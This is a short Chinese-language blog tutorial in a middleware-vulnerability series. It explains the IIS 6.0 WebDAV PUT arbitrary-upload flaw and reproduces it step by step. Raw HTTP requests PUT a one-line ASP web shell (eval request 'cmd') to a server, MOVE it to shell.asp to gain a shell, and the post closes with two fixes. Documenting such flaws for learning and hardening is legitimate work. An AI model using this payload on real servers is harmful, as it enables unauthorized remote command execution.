中间件漏洞篇 01 PUT漏洞

中间件

中间件是介于应用系统和系统软件之间的一类软件,它使用系统软件所提供的基础服务(功能),衔接网络上应用系统的各个部分或不同的应用,能够达到资源共享、功能共享的目的。它并没有很严格的定义,但是普遍接受IDC的定义:中间件是一种独立的系统软件服务程序,分布式应用软件借助这种软件在不同的技术之间共享资源,中间件位于客户机服务器的操作系统之上,管理计算资源和网络通信。从这个意义上可以用一个等式来表示中间件:中间件=平台+通信,这也就限定了只有用于分布式系统中才能叫中间件,同时也把它与支撑软件和实用软件区分开来。

中间件

 

 

常见的中间件有

  • iis
  • apache
  • tomacat
  • Zookeeper
  • nginx
  • jboss
  • Jetty
  • Zookeeper
  • weblogic
  • websphere
  • Glassfish
  • ......

这一篇只讲iis6.x其中的几个

1.1 PUT漏洞

1.漏洞描述

IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,造成任意文件上传。

版本:IIS 6.0

2.漏洞复现

 

 

 

用burpsuite 提交OPTIONS 查看支持的协议,可以将刚刚抓取下来的数据包的提交方式直接改为OPTIONS 提交

 

 可以看到它支持的协议,其中是支持PUT协议的

我们就可以上传一个文本

1 PUT /test.txtHTTP/1.1
2 Host:upload.moonteam.com 
3 Content-Length:25
4 
5 <%evalrequest("cmd")%>

发送,回显201

表示插入成功了,因为是不可以直接上传asp的,所有要把刚刚上传上去的文件修改其后缀

使用下面的命令进行修改后缀为asp。

MOVE/test.txtHTTP/1.1
Host:upload.moonteam.com
Destination:http://www.xxx.com/shell.asp

这里要有空格

回显201表示成功,shell.asp写入成功,使用工具可以直接getshell

3.漏洞修复

1.关闭webdav
2.关闭写入权限
 
 
 

 

posted @ 2021-10-18 19:44  甘雨小可爱!  阅读(669)  评论(0)    收藏  举报